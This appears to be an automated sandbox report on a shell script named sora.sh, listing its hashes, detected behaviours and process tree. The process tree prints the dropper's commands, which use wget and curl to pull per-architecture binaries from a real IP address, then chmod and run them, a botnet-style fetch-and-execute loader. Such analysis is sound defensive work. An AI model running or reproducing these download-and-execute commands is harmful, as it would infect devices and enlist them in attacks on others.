Analysis
-
max time kernel
31s -
max time network
35s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
29-08-2024 20:35
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
sora.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
sora.sh
-
Size
2KB
-
MD5
23ce60917752705f59bde8ca8569c3d6
-
SHA1
651959b325ca119ccc280a706ef57da197df6dfb
-
SHA256
c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
-
SHA512
9ce028bb852c3e0b67c66f55cd9b91a2498acccdb80b80220a3a99ca714521de13a1da5c9184ba6732bdb793df98effa7b5a511a5a3f5d30b57de6e88839329b
Malware Config
Signatures
-
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 692 robben /tmp/robben 705 robben /tmp/robben 711 robben /tmp/robben 720 robben /tmp/robben 732 robben /tmp/robben 743 robben /tmp/robben 756 robben /tmp/robben 775 robben /tmp/robben 790 robben /tmp/robben 801 robben /tmp/robben 807 robben /tmp/robben 813 robben /tmp/robben 828 robben /tmp/robben 838 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben sora.sh
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:666 -
/usr/bin/wgetwget http://188.127.247.15/bins/sora.x862⤵PID:673
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:678
-
-
/bin/catcat sora.x862⤵PID:687
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:690
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:692
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.mips2⤵PID:694
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
PID:697
-
-
/bin/catcat sora.mips2⤵PID:703
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:704
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:705
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.x86_642⤵PID:707
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:708
-
-
/bin/catcat sora.x86_642⤵PID:709
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:710
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:711
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.i4682⤵PID:714
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:715
-
-
/bin/catcat sora.i4682⤵PID:717
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:719
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:720
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.i6862⤵PID:722
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:725
-
-
/bin/catcat sora.i6862⤵PID:728
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:730
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:732
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.mpsl2⤵PID:734
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:737
-
-
/bin/catcat sora.mpsl2⤵PID:740
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:741
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm42⤵PID:746
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:749
-
-
/bin/catcat sora.arm42⤵PID:752
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:755
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm52⤵PID:759
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:761
-
-
/bin/catcat sora.arm52⤵PID:770
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:772
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm62⤵PID:778
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:780
-
-
/bin/catcat sora.arm62⤵PID:786
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:788
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm72⤵PID:792
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:796
-
-
/bin/catcat sora.arm72⤵PID:798
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:800
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.ppc2⤵PID:803
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:804
-
-
/bin/catcat sora.ppc2⤵PID:805
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:806
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:807
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.ppc440fp2⤵PID:809
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:810
-
-
/bin/catcat sora.ppc440fp2⤵PID:811
-
-
/bin/chmodchmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus072⤵PID:812
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:813
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.m68k2⤵PID:815
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:816
-
-
/bin/catcat sora.m68k2⤵PID:823
-
-
/bin/chmodchmod +x robben sora.sh2⤵PID:826
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:828
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.sh42⤵PID:830
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:833
-
-
/bin/catcat sora.sh42⤵PID:836
-
-
/bin/chmodchmod +x robben sora.sh2⤵PID:837
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:838
-